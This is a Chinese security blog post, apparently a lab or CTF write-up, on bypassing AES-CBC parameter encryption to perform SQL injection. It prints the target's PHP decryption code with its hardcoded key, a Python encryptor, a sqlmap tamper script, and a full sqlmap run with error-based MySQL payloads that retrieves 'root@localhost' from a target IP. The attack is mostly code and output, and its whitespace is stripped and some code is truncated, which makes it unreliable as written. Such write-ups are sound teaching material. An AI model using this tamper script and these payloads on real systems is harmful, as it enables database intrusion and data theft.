本文是i春秋论坛（）的表哥为大家分享一个在实战过程中会经常遇到的SQL注入题目及解题思路，公众号旨在为大家提供更多的学习方法与技能技巧，文章仅供学习参考。

这是一个比较基础的题，在实战中经常会遇到。比如说前端利用JavaScript公钥加密并传输给后端，后端通过私钥进行解密执行，这样做的好处就在于可以有效的避免了中间人攻击，跟SSL原理差不多，只是SSL在传输层，而这种加密是在应用层。

简单介绍了一下分享这篇文章的原因，那么就开始进入主题吧~

源码分析

先来看下后端的PHP源码：

functiondecode($data){$td=mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','20021');$data=mdecrypt_generic($td,base64_decode(base64_decode($data)));mcrypt_generic_deinit($td);mcrypt_module_close($td);if(substr(trim($data),-6)!=='_mozhe'){echo'="/";/script';}else{returnsubstr(trim($data),0,strlen(trim($data))-6);}}

这是一个解密函数，我们来逐条分析。

$td=mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

首先定义了一个变量，这个变量调用了打开PHPcrypto库中的加密函数。定义了加密方法为AES加密，加密模式为CBC，数据块为128位。

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','20021');

初始化加密缓冲区，描述为变量td。

加密密钥为：ydhaqPQnexoaDuW3

$data=mdecrypt_generic($td,base64_decode(base64_decode($data)));

进行两次base64的解密后，使用上述方法进行将加密的密文还原成明文。

mcrypt_generic_deinit($td);mcrypt_module_close($td);

结束加密，关闭加密模块。

if(substr(trim($data),-6)!=='_mozhe'){echo'="/";/script';}else{returnsubstr(trim($data),0,strlen(trim($data))-6);}

如果明文的后6位不是_mozhe，那么解密函数将不返回数据，并且跳转到上。

如果明文后6位是_mozhe，那么将返回加密值，并且去掉后面的_mozhe。

使用python构造加密函数

既然都已经知道了解密函数的写法，那就反推写出加密函数就好了。

-*-encoding:utf-8-*-'''?mod=spaceuid=210785:@Author:?mod=spaceuid=163876:W3bSafe'''frombase64importb64decode,(text):cryptor=('ydhaqPQnexoaDuW3',_CBC,IV="20021")length=16count=len(text)add=count%lengthifadd:text=text+('\0'*(length-add))ciphertext=(text)returnb64encode(b64encode(ciphertext))defdecrypt(text):cryptor=('ydhaqPQnexoaDuW3',_CBC,IV="20021")length=16count=len(text)add=count%lengthifadd:text=text+('\0'*(length-add))ciphertext=(b64decode(b64decode(text)))returnciphertextif__name__=='__main__':print("encrypt:"+encrypt(str(raw_input("Pleaseinputtextwithencrypt:"))))print("decrypt:"+decrypt(str(raw_input("Pleaseinputtextwithdecrypt:"))))

来尝试下写的加解密脚本是否正确与通用，首先我们先用这个Python脚本对明文：Thisisatestvalue_mozhe进行加密，得到加密后的结果为密文：

ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

Pleaseinputtextwithencrypt:Thisisatestvalue_mozheencrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=Pleaseinputtextwithdecrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=decrypt:Thisisatestvalue_mozhe

然后在写一个PHP文件，使用题目中所给的php函数对刚刚加密过的密文进行解密。

?phpfunctiondecode($data){$td=mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','20021');$data=mdecrypt_generic($td,base64_decode(base64_decode($data)));mcrypt_generic_deinit($td);mcrypt_module_close($td);if(substr(trim($data),-6)!=='_mozhe'){echo'="/";/script';}else{returnsubstr(trim($data),0,strlen(trim($data))-6);}}$val="ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=";echodecode($val);

执行结果：

解密成功。

构造sqlmaptamper脚本，进行注入测试

已经验证了python加密函数的可行性，那么直接把构造好的加密函数写成sqlmap，能运行的tamper脚本就ok了。别忘了要在明文后面加上_mozhe：

-*-encoding:utf-8-*-'''@File:@Author:Angel@Team:W3bSafe'''_ENCODING__priority__=(text):cryptor=('ydhaqPQnexoaDuW3',_CBC,IV="20021")length=16count=len(text)add=count%lengthifadd:text=text+('\0'*(length-add))ciphertext=(text)(ciphertext)defdepencies():passdeftamper(payload,**kwargs):payload=encrypt((payload+"_mozhe").encode('utf-8'))payload=(payload)returnpayload

让sqlmap加载tamper进行注入测试：

PSC:\WINDOWS\system32sqlmap-u""--tamper=mozhe--dbms=mysql--technique=E_____H________[.]___________{1.2.5.10dev}|_-|.["]|.'|.||___|_[(]_|_|_|__,|_||_|V|_|[!]legaldisclaimer:Usa'sresponsibilitytoobeyallapplicablelocal,magecausedbythisprogram[*]startingat11:46:20[11:46:20][DEBUG]cleaningupconfigurationparameters[11:46:20][INFO]loadingtampermodule'mozhe'[11:46:20][DEBUG]settingtheHTTPtimeout[11:46:20][DEBUG]creatingHTTPrequestsopenerobject[11:46:20][DEBUG]forcingback-DBMStouserdefinedvalue[11:46:21][WARNING]providedvalueforparameter'id',alwaysuseonlyvalidparametervaluessosqlmapcouldbeabletorunproperly[11:46:21][INFO]testingconnectiontothetargetURL[11:46:21][DEBUG]declaredwebpagecharset'utf-8'sqlmapresumedthefollowinginjectionpoint(s)fromstoredsession:---Parameter:id(GET)Type:error-basedTitle:MySQL=5.0基于报错注入-Parameterreplace(FLOOR)Payload:id=(SELECT1957FROM(SELECTCOUNT(*),CONCAT(0x7171766b71,(SELECT(ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))xFROMINFORMATION_)a)Vector:(SELECT[RANDNUM]FROM(SELECTCOUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))xFROMINFORMATION_)a)---[11:46:21][WARNING]changesmadebytamperingscriptsarenotincludedinshownpayloadcontent(s)[11:46:21][INFO]testingMySQL[11:46:21][DEBUG]searchingforerrorchunklength[11:46:21][PAYLOAD]RFA2U25sUmZkKzFxMWdtL1p2V2UwS0ZLWWVvdGx3cHJSTjRGZm56aDRteHRFdDZWbCtvRzdwK1gzTVV1cnFEaElYVStxcEFoWlg3ZzlkRldQaUFkL0J5Zzc4ZW1XT3pPS09BRU9kM3RodUFWNHdHNUFmQlNsMmh1cVZaQkNLQzRmVlhMUVV3SmVxUUw3RWNpVGdyNGNFbm8rTnZZNnFrK1BVWm1heloyUWNOQjBHUEpTTzIzNmkxVU5hcSs2MkpxUXRIbjNFK2l1dG5lZU8raWhlaUhLTHBRMVdNS3k2RWxaMlZWbnZHaEU4MD0=[11:46:21][PAYLOAD]eWhEcGExNjE4RVlaQWxtY0NHc0paRTNKZ3FkQmFYZFBRa3dqRVQ2Z255c2ZqdGtuZHJ3UUV2Z0hxM2ZBVUszOU5wRCtRd3dSamxMQjNNdi9IaG5OV1d0cW5lMERWeTloY1VOTDJ6T2RmT3ZURnk1L29Ici81MmJVR3E2eXFvL0VxUWY4dzM0SGp2WHBidFF1amJHdUJNcGx1djBqbEJQQmljNUpna0RXV1JjVCtYVWhraWRGSDNEN0g5a2Robk9uc0MxUTl1djFuU1c3b3ZER0lVVE1XTWlFdEhYNFhzQWl6dzdvYnZQMWozdz0=[11:46:21][PAYLOAD]d3FlMjAyVFRiZVRPaEx1RWVGMW9kajRzUFRVQVkzMmtFMk4vZ0dCOHQranVkZ2o5dkFubnBTY0NWTG5oUnpXUk4wNWN6YXNRQjRWMVBzaFk4ZTBTV3pXMm9mWFRLT0FnNHVFWE1IVjdMNTFhNEs0a2Q4RmNCcmxUd2ZMNjVVOWlpU1llcW9uM1VaTk4wYzN1VWR4aFJvQUpBVG85VFVnd3JXSlE4UHk2UEwzbGMwekhNbFRCVlFpN1RtUU5MN1BDeVBnRUQwQkd5UVJIcGpjS1N0RG5CUWk3N0VyOEI2UWFhRElFSXR2cHFzOD0=[11:46:21][PAYLOAD]RDBtcGNRSlpGczgwc2dlMEVoV3A0Y3NJeEJMeEZsU3R2cDFwdGlvUDhDK3ZKeTZjTmN0Y21rSEJRWUZjckU3MWs3SWloWFZYeGR4a29hOUlhSlZJdS9kUmxlWnAxcm1DdGYxeUlElSGNKVkZ0WVdMaERob0QvTFdqUFViRDgxeitOVUdHcTdpdWdsRDYvUHMza3dNVU0xRUFDZXZkd1EvelR0cDRVWThEV2pqS05CVEdibDFzWXUwMlNwbzdyWitHK09CVkNlY3hIT3ljYlA0WXRiZ1gzcXBQUFNqbHVEcXF5VHhWUllRTT0=[11:46:21][PAYLOAD]RGpHTFQ3b21KMytJL2dMWWs5aTlnWklRTG1rQkYwKzRDYjc5TGxOSnBtVlVxZjRuZ1pBcGVFUk1DS05QNFNIbUVaQlIyZTc4WVJ3djVweHJIMi96K3FkcWs5SkZ6V1B5dWZUSHM1R1I2SCtCYkprNHI5elA0TStVdXJ6RGN0c3NHVytFaERGMCsvcWVmWjNwcncrZXk1VnNtN1hQRWhaOUZUeGxNK3JkeGZsUUtSK2RwR3J1Wm9tOVBDTDFnZncwUkhGa08zWEhmZHg3eHZrTHYxd2FycEtYeVlxMHhxcUo1ZVB2Ym1nbWw5YXFFY3VrNW80SlN6dFBRbU5FNFZRV1FKOWZlcVZpQ21jVUpFcUNFd3BINVE9PQ==[11:46:21][DEBUG][11:46:21][INFO]confirmingMySQL[11:46:21][PAYLOAD]OTF0QkkwZDFQVm9od003UGR6dUxGS3hrcUlXT3RJSTExUlkrRmpwcjV5cWZ3MTNpc0dia3NUQU11UnR**c4b1RBREhRbHlPL1h6UUJDY01mYmRoQktHcXY0YWdIZVFaZ08va0NNTzdtcms5bGJNQ2VoUUNYeC9weFE5dEZvdzdIdmJuUDJXTzNqdHdNc0VjcnV6ZWw0L3NMRWx5dXdZMzNYUlluUndGMEtLYW9GZ0hvT2FjOWVsdFVWdGdTZEVnQUZ3S1AzRDBYUEdwUUV2UUx1c2RFa041NTF3UERDVlJPcHQzRzdXMEtOSlA0dEJiRXpGeE1zTlUwTmpXTmFCdVNRdG1YaE5WelVldmlxL1VsY1d4bHc9PQ==[11:46:21][DEBUG][11:46:21][PAYLOAD]Q0dLbmNOU1FkMFgybFQ0d1ozS3RNVmtlaTVPdVdrUzg2VzQwRFNXM2ZuYlpMaURTZmd2ZC9NV1U0b2tsT1FxT3FmekJGSjdWR0JiNG5HS3ViMktnNmRTU0xzZit6RkJUcjkvVjF5RlhObzdXdzBjSkpJYW5KaWN0ZU5rU25FcDlKV1poMFRDQzN0bEx0bzJteTBEQVhNbkR1eEJYWjNlOWk1Wkp2OGZ6T3RYS2M1OGJCS2htamQxajdXWmIyZ3V0a0FncFRVMFZCWm1aVVZ4QnhXOEJRTUtWZC9Fd0lmaUdNSlFTNHNrSUV5L1Uxb3hoWVdDcGNFcXpvVXRhUHcrWTlPbXFTb0t1RVBsQXF3bFVCakYzdVljNFRYcTg1Y3hsRjFFcy8wbEY4TTA9[11:46:21][DEBUG][11:46:21][PAYLOAD]ank5ZzZJb3ZNOWFvR2JhQWQrRG9OUmY1MnlIczZMalZiY0IweS9leUp5WitncTlubU5ML0cvT0RmTTV2QmpiRWhiSktMazA0UkNkSEU3ZkJCTmhmNGlrQ0JtMVh2c0xFSGg4STcrTzVObWRpYlNXTUtVY0RpVDcrT3g5czdaTzNmY1NzTnNrSnJ6VmppZ2lNUWI4QVBIajlDVktRdG1yb0ZBcGpXa3N2ejNZbTE1UUZHdnBZSC91U09IM1hCeHg2VlV6Ni9mWHlEZlZ3WDhnSjI4dDJtc3l4SXJlRGVEVjhkZEJKZjg1dWtyVDRZcjFwbWlhRVJPcHJpbThyblFNeHNHKytkT2t1c2tLb2VpdHdSMjJLc09RQlpqam5MbUhaUUZ5Vzc0dkk2SUE9[11:46:21][DEBUG][11:46:21][INFO]theback-DBMSisMySQLwebserveroperatingsystem:LinuxUbuntuwebapplicationtechnology:Nginxback-DBMS:MySQL=5.0.0[11:46:21][INFO]fetchingcurrentuser[11:46:21][PAYLOAD]dGV3cy9FUklKc3lJei9iV1lzVzhFck5DaDJzY1UvQVV3bXQ4NERwOFRkMi9ncGExU0JLRnNYSitDQ3lVVlZUZmxUcFFDUFRzckhJS2tLVVRDbHlUZjZSenVEWW05aytrN3BYdEwxT3g2aXJLc1BjWXRzZThSa2FiN0FhVkF6Q0RHek5tSFNncjR6RnJ5TjFKRkxZMi9YMmlMV0Zrc3RLbTNCbDFmUzZJTEhPM2l1dGhrRkpDOTh5S1c3S1dGV0E3QTNNaWY4SFNCdHJmS0FpZmQ4ajhBT1d5RjFtaVR5TnBjOGx5WGVxN09kVHJlUFRURTZNL2JCeUNRSnVQa20xWkxZRW9FZytiRzRsZ1lsdzRKa1hPWlE9PQ==[11:46:21][INFO]retrieved:root@localhost[11:46:21][DEBUG]:'root@localhost'[11:46:21][INFO]fetcheddataloggedtotextfilesunder'C:\Users\admin\.sqlmap\output\219.153.49.228'[*]shuttingdownat11:46:21PSC:\WINDOWS\system32

对sqlmap的payload进行测试。

完成。

今天的文章分享，小伙伴们看懂了吗？